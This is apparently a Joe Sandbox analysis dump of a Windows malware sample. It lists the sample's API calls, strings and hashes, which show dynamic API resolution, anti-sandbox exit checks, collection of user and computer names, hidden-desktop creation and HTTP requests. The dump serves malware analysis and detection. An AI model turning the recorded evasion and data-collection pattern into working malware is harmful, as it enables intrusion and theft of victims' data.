                                • Opcode ID: ae13a19c9439de30ece96423360528716376f43f399fe4dfdb5275a6b4a2b342
                                • Instruction ID: dfa8d5f9e61645e2ec6d0b79ea7d9128279d51e0aeb8eb375ca7214ea577e958
                                • Opcode Fuzzy Hash: ae13a19c9439de30ece96423360528716376f43f399fe4dfdb5275a6b4a2b342
                                • Instruction Fuzzy Hash: 90528E319016169BDB21EFA4DE89BEEB7B9EF84320F154424F905BB291DB30EC45CB90

                                Control-flow Graph

                                APIs
                                • GetProcAddress.KERNEL32(77190000,010C1570), ref: 009D63E9
                                • GetProcAddress.KERNEL32(77190000,010C16F0), ref: 009D6402
                                • GetProcAddress.KERNEL32(77190000,010C1648), ref: 009D641A
                                • GetProcAddress.KERNEL32(77190000,010C1510), ref: 009D6432
                                • GetProcAddress.KERNEL32(77190000,010C8B28), ref: 009D644B
                                • GetProcAddress.KERNEL32(77190000,010B5650), ref: 009D6463
                                • GetProcAddress.KERNEL32(77190000,010B54D0), ref: 009D647B
                                • GetProcAddress.KERNEL32(77190000,010C1540), ref: 009D6494
                                • GetProcAddress.KERNEL32(77190000,010C1588), ref: 009D64AC
                                • GetProcAddress.KERNEL32(77190000,010C15B8), ref: 009D64C4
                                • GetProcAddress.KERNEL32(77190000,010C1558), ref: 009D64DD
                                • GetProcAddress.KERNEL32(77190000,010B5370), ref: 009D64F5
                                • GetProcAddress.KERNEL32(77190000,010C1708), ref: 009D650D
                                • GetProcAddress.KERNEL32(77190000,010C15D0), ref: 009D6526
                                • GetProcAddress.KERNEL32(77190000,010B54B0), ref: 009D653E
                                • GetProcAddress.KERNEL32(77190000,010C1720), ref: 009D6556
                                • GetProcAddress.KERNEL32(77190000,010C1528), ref: 009D656F
                                • GetProcAddress.KERNEL32(77190000,010B54F0), ref: 009D6587
                                • GetProcAddress.KERNEL32(77190000,010C1660), ref: 009D659F
                                • GetProcAddress.KERNEL32(77190000,010B53F0), ref: 009D65B8
                                • LoadLibraryA.KERNEL32(010C1678,?,?,?,009D1C03), ref: 009D65C9
                                • LoadLibraryA.KERNEL32(010C15A0,?,?,?,009D1C03), ref: 009D65DB
                                • LoadLibraryA.KERNEL32(010C15E8,?,?,?,009D1C03), ref: 009D65ED
                                • LoadLibraryA.KERNEL32(010C16A8,?,?,?,009D1C03), ref: 009D65FE
                                • LoadLibraryA.KERNEL32(010C1690,?,?,?,009D1C03), ref: 009D6610
                                • GetProcAddress.KERNEL32(76850000,010C1738), ref: 009D662D
                                • GetProcAddress.KERNEL32(77040000,010C1750), ref: 009D6649
                                • GetProcAddress.KERNEL32(77040000,010C1768), ref: 009D6661
                                • GetProcAddress.KERNEL32(75A10000,010C8E40), ref: 009D667D
                                • GetProcAddress.KERNEL32(75690000,010B56D0), ref: 009D6699
                                • GetProcAddress.KERNEL32(776F0000,010C8BF8), ref: 009D66B5
                                • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 009D66CC
                                Strings
                                • NtQueryInformationProcess, xrefs: 009D66C1
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: 70f70698ec0c63aac06f91d83738106788259ba3dd990b488426004aaf02d6b3
                                • Instruction ID: d8432121b5dfbcf55e7a68a39ac0374da13ff51101aa163aaeebc3f492b29cef
                                • Opcode Fuzzy Hash: 70f70698ec0c63aac06f91d83738106788259ba3dd990b488426004aaf02d6b3
                                • Instruction Fuzzy Hash: C9A196F5911680DFD754DF65EDC8A2637B9FB883413808919E91ACB362DF34A904DF60

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C1570), ref: 009D63E9
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C16F0), ref: 009D6402
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C1648), ref: 009D641A
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C1510), ref: 009D6432
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C8B28), ref: 009D644B
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010B5650), ref: 009D6463
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010B54D0), ref: 009D647B
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C1540), ref: 009D6494
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C1588), ref: 009D64AC
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C15B8), ref: 009D64C4
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C1558), ref: 009D64DD
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010B5370), ref: 009D64F5
                                  • Part of subcall function 009D6390: GetProcAddress.KERNEL32(77190000,010C1708), ref: 009D650D
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D1C2F
                                • ExitProcess.KERNEL32 ref: 009D1C67
                                • GetSystemInfo.KERNEL32(?), ref: 009D1C71
                                • ExitProcess.KERNEL32 ref: 009D1C7F
                                  • Part of subcall function 009B1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 009B1046
                                  • Part of subcall function 009B1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 009B104D
                                  • Part of subcall function 009B1030: ExitProcess.KERNEL32 ref: 009B1058
                                  • Part of subcall function 009B10C0: GlobalMemoryStatusEx.KERNEL32 ref: 009B10EA
                                  • Part of subcall function 009B10C0: ExitProcess.KERNEL32 ref: 009B1114
                                • GetUserDefaultLangID.KERNEL32 ref: 009D1C8F
                                • ExitProcess.KERNEL32 ref: 009D1CB2
                                • ExitProcess.KERNEL32 ref: 009D1CE1
                                • lstrlen.KERNEL32(010C8BE8), ref: 009D1CEE
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D1D15
                                • lstrcat.KERNEL32(00000000,010C8BE8), ref: 009D1D1D
                                • lstrlen.KERNEL32(009E4B98), ref: 009D1D28
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1D48
                                • lstrcat.KERNEL32(00000000,009E4B98), ref: 009D1D54
                                • lstrlen.KERNEL32(00000000), ref: 009D1D63
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1D89
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009D1D94
                                • lstrlen.KERNEL32(009E4B98), ref: 009D1D9F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1DBC
                                • lstrcat.KERNEL32(00000000,009E4B98), ref: 009D1DC8
                                • lstrlen.KERNEL32(00000000), ref: 009D1DD7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1DF9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009D1E04
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                • String ID:
                                • API String ID: 3366406952-0
                                • Opcode ID: 652bd6329f6cafd1f3c0f378eae987dc094380d1309ff93f374faa63cea610a6
                                • Instruction ID: d8c516792ab165768eee8461da696f0813c7a2a7d10ecce11bcd30a5d520f079
                                • Opcode Fuzzy Hash: 652bd6329f6cafd1f3c0f378eae987dc094380d1309ff93f374faa63cea610a6
                                • Instruction Fuzzy Hash: 52719432580656BBDB21AFB0DD89B6E377EEF84711F048425F90AAB291DF709C05CB61

                                Control-flow Graph

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009B4AA3
                                • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 009B4BB0
                                Strings
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-3329630956
                                • Opcode ID: c551e18688f280e881403f24e849df680965e3c240c2a58cc96f541803a91fc3
                                • Instruction ID: 29bee113ea06f93023a6aa4839031fd1ed5e0d2c8abd502f1ebb259111b56d17
                                • Opcode Fuzzy Hash: c551e18688f280e881403f24e849df680965e3c240c2a58cc96f541803a91fc3
                                • Instruction Fuzzy Hash: 4C310A19F802AD768622EBEF4C47F5F6ED5DFC5F68B224076750877182C9A55C00CAE2

                                Control-flow Graph

                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 009D2AFF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D2B06
                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 009D2B1A
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 361734184afe5c652b6dff1bed4711ba5e1e0371d27b8d6fd30c6d280606cbfc
                                • Instruction ID: f316863934c304f2596060587385e85eb5f02ca64bd8dc33ed9e66fc006bfefc
                                • Opcode Fuzzy Hash: 361734184afe5c652b6dff1bed4711ba5e1e0371d27b8d6fd30c6d280606cbfc
                                • Instruction Fuzzy Hash: C801D172A44248ABC710DF99EC85BAEF7BCF745B21F00026BF919E3780D77419048BA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 009D2A6F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D2A76
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 009D2A8A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: e0b4af44eb81a0f583a1d56c2f4b7b56f860ebb3021fc77b8b3bb755654be5de
                                • Instruction ID: ae74e561940e3683f005609c7cc4b1137980406867d75de874c6174146ba49ab
                                • Opcode Fuzzy Hash: e0b4af44eb81a0f583a1d56c2f4b7b56f860ebb3021fc77b8b3bb755654be5de
                                • Instruction Fuzzy Hash: BFF054B1A44654ABD710DF98DD49F9EBBBCF745B21F100216F915E3780D774190486E1

                                Control-flow Graph: basic blocks 9d66e0-9d71d3 (rendered graph not reproduced)
                                APIs
                                • GetProcAddress.KERNEL32(77190000,010B5350), ref: 009D66F5
                                • GetProcAddress.KERNEL32(77190000,010B53D0), ref: 009D670D
                                • GetProcAddress.KERNEL32(77190000,010C9068), ref: 009D6726
                                • GetProcAddress.KERNEL32(77190000,010C8FF0), ref: 009D673E
                                • GetProcAddress.KERNEL32(77190000,010C9080), ref: 009D6756
                                • GetProcAddress.KERNEL32(77190000,010CD460), ref: 009D676F
                                • GetProcAddress.KERNEL32(77190000,010BA528), ref: 009D6787
                                • GetProcAddress.KERNEL32(77190000,010CD610), ref: 009D679F
                                • GetProcAddress.KERNEL32(77190000,010CD730), ref: 009D67B8
                                • GetProcAddress.KERNEL32(77190000,010CD508), ref: 009D67D0
                                • GetProcAddress.KERNEL32(77190000,010CD5E0), ref: 009D67E8
                                • GetProcAddress.KERNEL32(77190000,010B55B0), ref: 009D6801
                                • GetProcAddress.KERNEL32(77190000,010B5410), ref: 009D6819
                                • GetProcAddress.KERNEL32(77190000,010B55F0), ref: 009D6831
                                • GetProcAddress.KERNEL32(77190000,010B5470), ref: 009D684A
                                • GetProcAddress.KERNEL32(77190000,010CD640), ref: 009D6862
                                • GetProcAddress.KERNEL32(77190000,010CD448), ref: 009D687A
                                • GetProcAddress.KERNEL32(77190000,010BA898), ref: 009D6893
                                • GetProcAddress.KERNEL32(77190000,010B5530), ref: 009D68AB
                                • GetProcAddress.KERNEL32(77190000,010CD4A8), ref: 009D68C3
                                • GetProcAddress.KERNEL32(77190000,010CD6A0), ref: 009D68DC
                                • GetProcAddress.KERNEL32(77190000,010CD6E8), ref: 009D68F4
                                • GetProcAddress.KERNEL32(77190000,010CD568), ref: 009D690C
                                • GetProcAddress.KERNEL32(77190000,010B56B0), ref: 009D6925
                                • GetProcAddress.KERNEL32(77190000,010CD628), ref: 009D693D
                                • GetProcAddress.KERNEL32(77190000,010CD5B0), ref: 009D6955
                                • GetProcAddress.KERNEL32(77190000,010CD700), ref: 009D696E
                                • GetProcAddress.KERNEL32(77190000,010CD478), ref: 009D6986
                                • GetProcAddress.KERNEL32(77190000,010CD490), ref: 009D699E
                                • GetProcAddress.KERNEL32(77190000,010CD4F0), ref: 009D69B7
                                • GetProcAddress.KERNEL32(77190000,010CD580), ref: 009D69CF
                                • GetProcAddress.KERNEL32(77190000,010CD4C0), ref: 009D69E7
                                • GetProcAddress.KERNEL32(77190000,010CD4D8), ref: 009D6A00
                                • GetProcAddress.KERNEL32(77190000,010BFDD8), ref: 009D6A18
                                • GetProcAddress.KERNEL32(77190000,010CD718), ref: 009D6A30
                                • GetProcAddress.KERNEL32(77190000,010CD658), ref: 009D6A49
                                • GetProcAddress.KERNEL32(77190000,010B5610), ref: 009D6A61
                                • GetProcAddress.KERNEL32(77190000,010CD670), ref: 009D6A79
                                • GetProcAddress.KERNEL32(77190000,010B5630), ref: 009D6A92
                                • GetProcAddress.KERNEL32(77190000,010CD520), ref: 009D6AAA
                                • GetProcAddress.KERNEL32(77190000,010CD688), ref: 009D6AC2
                                • GetProcAddress.KERNEL32(77190000,010B5670), ref: 009D6ADB
                                • GetProcAddress.KERNEL32(77190000,010B5690), ref: 009D6AF3
                                • LoadLibraryA.KERNEL32(010CD538,009D051F), ref: 009D6B05
                                • LoadLibraryA.KERNEL32(010CD5C8), ref: 009D6B16
                                • LoadLibraryA.KERNEL32(010CD6B8), ref: 009D6B28
                                • LoadLibraryA.KERNEL32(010CD6D0), ref: 009D6B3A
                                • LoadLibraryA.KERNEL32(010CD550), ref: 009D6B4B
                                • LoadLibraryA.KERNEL32(010CD598), ref: 009D6B5D
                                • LoadLibraryA.KERNEL32(010CD5F8), ref: 009D6B6F
                                • LoadLibraryA.KERNEL32(010CD790), ref: 009D6B80
                                • GetProcAddress.KERNEL32(77040000,010B52D0), ref: 009D6B9C
                                • GetProcAddress.KERNEL32(77040000,010CD868), ref: 009D6BB4
                                • GetProcAddress.KERNEL32(77040000,010C8C08), ref: 009D6BCD
                                • GetProcAddress.KERNEL32(77040000,010CD880), ref: 009D6BE5
                                • GetProcAddress.KERNEL32(77040000,010B5150), ref: 009D6BFD
                                • GetProcAddress.KERNEL32(73CA0000,010BA780), ref: 009D6C1D
                                • GetProcAddress.KERNEL32(73CA0000,010B5170), ref: 009D6C35
                                • GetProcAddress.KERNEL32(73CA0000,010BA7F8), ref: 009D6C4E
                                • GetProcAddress.KERNEL32(73CA0000,010CD898), ref: 009D6C66
                                • GetProcAddress.KERNEL32(73CA0000,010CD748), ref: 009D6C7E
                                • GetProcAddress.KERNEL32(73CA0000,010B51D0), ref: 009D6C97
                                • GetProcAddress.KERNEL32(73CA0000,010B4F50), ref: 009D6CAF
                                • GetProcAddress.KERNEL32(73CA0000,010CD8B0), ref: 009D6CC7
                                • GetProcAddress.KERNEL32(768D0000,010B51B0), ref: 009D6CE3
                                • GetProcAddress.KERNEL32(768D0000,010B4FD0), ref: 009D6CFB
                                • GetProcAddress.KERNEL32(768D0000,010CD8C8), ref: 009D6D14
                                • GetProcAddress.KERNEL32(768D0000,010CD760), ref: 009D6D2C
                                • GetProcAddress.KERNEL32(768D0000,010B51F0), ref: 009D6D44
                                • GetProcAddress.KERNEL32(75790000,010BA550), ref: 009D6D64
                                • GetProcAddress.KERNEL32(75790000,010BA820), ref: 009D6D7C
                                • GetProcAddress.KERNEL32(75790000,010CD820), ref: 009D6D95
                                • GetProcAddress.KERNEL32(75790000,010B5190), ref: 009D6DAD
                                • GetProcAddress.KERNEL32(75790000,010B5210), ref: 009D6DC5
                                • GetProcAddress.KERNEL32(75790000,010BA848), ref: 009D6DDE
                                • GetProcAddress.KERNEL32(75A10000,010CD7C0), ref: 009D6DFE
                                • GetProcAddress.KERNEL32(75A10000,010B52B0), ref: 009D6E16
                                • GetProcAddress.KERNEL32(75A10000,010C8BD8), ref: 009D6E2F
                                • GetProcAddress.KERNEL32(75A10000,010CD8F8), ref: 009D6E47
                                • GetProcAddress.KERNEL32(75A10000,010CD778), ref: 009D6E5F
                                • GetProcAddress.KERNEL32(75A10000,010B5330), ref: 009D6E78
                                • GetProcAddress.KERNEL32(75A10000,010B4F70), ref: 009D6E90
                                • GetProcAddress.KERNEL32(75A10000,010CD7A8), ref: 009D6EA8
                                • GetProcAddress.KERNEL32(75A10000,010CD8E0), ref: 009D6EC1
                                • GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 009D6ED7
                                • GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 009D6EEE
                                • GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 009D6F05
                                • GetProcAddress.KERNEL32(76850000,010B5050), ref: 009D6F21
                                • GetProcAddress.KERNEL32(76850000,010CD7D8), ref: 009D6F39
                                • GetProcAddress.KERNEL32(76850000,010CD7F0), ref: 009D6F52
                                • GetProcAddress.KERNEL32(76850000,010CD808), ref: 009D6F6A
                                • GetProcAddress.KERNEL32(76850000,010CD838), ref: 009D6F82
                                • GetProcAddress.KERNEL32(75690000,010B4F90), ref: 009D6F9E
                                • GetProcAddress.KERNEL32(75690000,010B50D0), ref: 009D6FB6
                                • GetProcAddress.KERNEL32(769C0000,010B50B0), ref: 009D6FD2
                                • GetProcAddress.KERNEL32(769C0000,010CD850), ref: 009D6FEA
                                • GetProcAddress.KERNEL32(6F8C0000,010B52F0), ref: 009D700A
                                • GetProcAddress.KERNEL32(6F8C0000,010B5090), ref: 009D7022
                                • GetProcAddress.KERNEL32(6F8C0000,010B5030), ref: 009D703B
                                • GetProcAddress.KERNEL32(6F8C0000,010CD2C8), ref: 009D7053
                                • GetProcAddress.KERNEL32(6F8C0000,010B5230), ref: 009D706B
                                • GetProcAddress.KERNEL32(6F8C0000,010B5070), ref: 009D7084
                                • GetProcAddress.KERNEL32(6F8C0000,010B5250), ref: 009D709C
                                • GetProcAddress.KERNEL32(6F8C0000,010B50F0), ref: 009D70B4
                                • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 009D70CB
                                • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 009D70E2
                                • GetProcAddress.KERNEL32(75D90000,010CD3E8), ref: 009D70FE
                                • GetProcAddress.KERNEL32(75D90000,010C8BA8), ref: 009D7116
                                • GetProcAddress.KERNEL32(75D90000,010CD238), ref: 009D712F
                                • GetProcAddress.KERNEL32(75D90000,010CD2E0), ref: 009D7147
                                • GetProcAddress.KERNEL32(76470000,010B4FB0), ref: 009D7163
                                • GetProcAddress.KERNEL32(6D760000,010CD1F0), ref: 009D717F
                                • GetProcAddress.KERNEL32(6D760000,010B5270), ref: 009D7197
                                • GetProcAddress.KERNEL32(6D760000,010CD3D0), ref: 009D71B0
                                • GetProcAddress.KERNEL32(6D760000,010CD1C0), ref: 009D71C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                • API String ID: 2238633743-3468015613
                                • Opcode ID: 79a4d2a3d4f5676488ca0fadeca6fee1f3370479ed342a349e89ebce5a8d9996
                                • Instruction ID: a89cb77d6c9d9c2ab056a51f7a6df4c2585f436ff569a308931e935dec79aad9
                                • Opcode Fuzzy Hash: 79a4d2a3d4f5676488ca0fadeca6fee1f3370479ed342a349e89ebce5a8d9996
                                • Instruction Fuzzy Hash: 036263F5610A80AFD754DF65EDC8A2637BAFB883013508919E95ACB371DF34A908DF60
                                APIs
                                • lstrlen.KERNEL32(009DCFEC), ref: 009CF1D5
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CF1F1
                                • lstrlen.KERNEL32(009DCFEC), ref: 009CF1FC
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CF215
                                • lstrlen.KERNEL32(009DCFEC), ref: 009CF220
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CF239
                                • lstrcpy.KERNEL32(00000000,009E4FA0), ref: 009CF25E
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CF28C
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CF2C0
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CF2F0
                                • lstrlen.KERNEL32(010B55D0), ref: 009CF315
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 1147b0883611fbe25f5ecb09f926001d95f38e7b36b4791c577691a322db10b6
                                • Instruction ID: d502df5d0a1d0688c45a4c496a9c2c94e71841e1cfb2e6fc88a285b9972c5fe7
                                • Opcode Fuzzy Hash: 1147b0883611fbe25f5ecb09f926001d95f38e7b36b4791c577691a322db10b6
                                • Instruction Fuzzy Hash: 69A26C70D012469FDB24DF65CA98B5ABBFAAF44310B18807DE809EB3A1DB35DC45CB52
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D0013
                                • lstrlen.KERNEL32(009DCFEC), ref: 009D00BD
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D00E1
                                • lstrlen.KERNEL32(009DCFEC), ref: 009D00EC
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D0110
                                • lstrlen.KERNEL32(009DCFEC), ref: 009D011B
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D013F
                                • lstrlen.KERNEL32(009DCFEC), ref: 009D015A
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D0189
                                • lstrlen.KERNEL32(009DCFEC), ref: 009D0194
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D01C3
                                • lstrlen.KERNEL32(009DCFEC), ref: 009D01CE
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D0206
                                • lstrlen.KERNEL32(009DCFEC), ref: 009D0250
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D0288
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D059B
                                • lstrlen.KERNEL32(010B5510), ref: 009D05AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D05D7
                                • lstrcat.KERNEL32(00000000,?), ref: 009D05E3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D060E
                                • lstrlen.KERNEL32(010CEE70), ref: 009D0625
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D064C
                                • lstrcat.KERNEL32(00000000,?), ref: 009D0658
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D0681
                                • lstrlen.KERNEL32(010B5590), ref: 009D0698
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D06C9
                                • lstrcat.KERNEL32(00000000,?), ref: 009D06D5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D0706
                                • lstrcpy.KERNEL32(00000000,010C8AD8), ref: 009D074B
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1557
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1579
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B159B
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D077F
                                • lstrcpy.KERNEL32(00000000,010CED80), ref: 009D07E7
                                • lstrcpy.KERNEL32(00000000,010C8958), ref: 009D0858
                                • lstrcpy.KERNEL32(00000000,fplugins), ref: 009D08CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D0928
                                • lstrcpy.KERNEL32(00000000,010C88C8), ref: 009D09F8
                                  • Part of subcall function 009B24E0: lstrcpy.KERNEL32(00000000,?), ref: 009B2528
                                  • Part of subcall function 009B24E0: lstrcpy.KERNEL32(00000000,?), ref: 009B254E
                                  • Part of subcall function 009B24E0: lstrcpy.KERNEL32(00000000,?), ref: 009B2577
                                • lstrcpy.KERNEL32(00000000,010C8918), ref: 009D0ACE
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D0B81
                                • lstrcpy.KERNEL32(00000000,010C8918), ref: 009D0D58
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID: fplugins
                                • API String ID: 2500673778-38756186
                                • Opcode ID: 491c95bdec6ee8dbe509cb066482019ebb5d459d9659f581b8d690c867715527
                                • Instruction ID: 21f860aeeaeae282b78fdf850abb08e9081fcf2106e0967f5959c7db1d6c3453
                                • Opcode Fuzzy Hash: 491c95bdec6ee8dbe509cb066482019ebb5d459d9659f581b8d690c867715527
                                • Instruction Fuzzy Hash: 64E26971A053418FD724DF29C588BAABBE4BF88314F58C56EE48D8B362DB31D845CB52

                                 Control-flow Graph (function at 9b6c40; rendered graph not reproduced, basic blocks listed in address order with the APIs they call)
                                 • 9b6c40 call 9b2930; 9b6c6d lstrcpy; 9b6c75 call 9b4bc0 (the InternetCrackUrlA routine below); 9b6caa call 9b2930; 9b6cbc lstrcpy
                                 • 9b6cc8 InternetOpenA, StrCmpCA; 9b6d02 InternetConnectA; 9b6d28 HttpOpenRequestA; 9b6d67 InternetSetOptionA; 9b6d7d HttpSendRequestA, HttpQueryInfoA
                                 • 9b6daf call 9d71e0, 9b2a20 x2; 9b6dd4 call 9d3d90; 9b6dee InternetReadFile; 9b6e17 call 9d7310; 9b6e3f call 9b2a20; 9b6e44 call 9b2930; 9b6e59 lstrcpy; 9b6e61 call 9b2a20, InternetReadFile (loops back to 9b6e10)
                                 • 9b6e8d, 9b6e94, 9b6ea1 InternetCloseHandle; 9b6ea8 call 9b2930; 9b6ec1 lstrcpy; 9b6ec9 call 9b2a20 x2
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B6C6F
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B6CC2
                                • InternetOpenA.WININET(009DCFEC,00000001,00000000,00000000,00000000), ref: 009B6CD5
                                • StrCmpCA.SHLWAPI(?,010CF498), ref: 009B6CED
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009B6D15
                                • HttpOpenRequestA.WININET(00000000,GET,?,010CEEB8,00000000,00000000,-00400100,00000000), ref: 009B6D50
                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 009B6D77
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009B6D86
                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 009B6DA5
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009B6DFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B6E5B
                                • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 009B6E7D
                                • InternetCloseHandle.WININET(00000000), ref: 009B6E8E
                                • InternetCloseHandle.WININET(?), ref: 009B6E98
                                • InternetCloseHandle.WININET(00000000), ref: 009B6EA2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B6EC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                • String ID: ERROR$GET
                                • API String ID: 3687753495-3591763792
                                • Opcode ID: cff0f6383da3cedc163aaf6d1bb836b10615fcf10c6f823a3e3bc43668f2f9f0
                                • Instruction ID: 1e2ca7b7d05e6a7505d8250f130e15e25e73fc0d0acc35fad3319665fea7e7c0
                                • Opcode Fuzzy Hash: cff0f6383da3cedc163aaf6d1bb836b10615fcf10c6f823a3e3bc43668f2f9f0
                                • Instruction Fuzzy Hash: 2C818271A41215ABEB20DFA4DD89FEE77B9EF44720F144068F909EB281DB74ED048B90
                                APIs
                                • lstrlen.KERNEL32(010B55D0), ref: 009CF315
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CF3A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CF3C7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CF47B
                                • lstrcpy.KERNEL32(00000000,010B55D0), ref: 009CF4BB
                                • lstrcpy.KERNEL32(00000000,010C8AC8), ref: 009CF4EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CF59E
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009CF61C
